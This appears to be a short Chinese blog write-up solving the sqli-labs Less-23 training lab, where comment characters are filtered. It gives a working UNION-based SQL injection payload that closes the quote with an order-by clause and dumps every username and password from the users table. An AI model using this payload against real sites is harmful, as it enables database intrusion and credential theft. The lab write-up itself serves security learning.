美文网首页
sqli-labs Less-23

sqli-labs Less-23

作者: jun123123 | 来源:发表于2019-10-17 00:02 被阅读0次

    首先判断注入类型为单字符注入,但是用0' or 1=1 %23进行注入时发现没有正确回显


    1.png

    结合题名大概猜测过滤了注释符。
    通过报错猜测sql语句为

    select * from users where id='$id' limit 0,1
    

    因为过滤了注释符,无法通过注释掉后面一个'来闭合引号
    既然要闭合',那么必须通过构造字符串
    因此考虑使用order by语句
    构造payload:

    ?id=0' union select 1,group_concat(username),group_concat(password) from users order by '1
    
    2.png

    注入成功

    相关文章

      网友评论

          本文标题:sqli-labs Less-23

          本文链接:https://www.haomeiwen.com/subject/txppmctx.html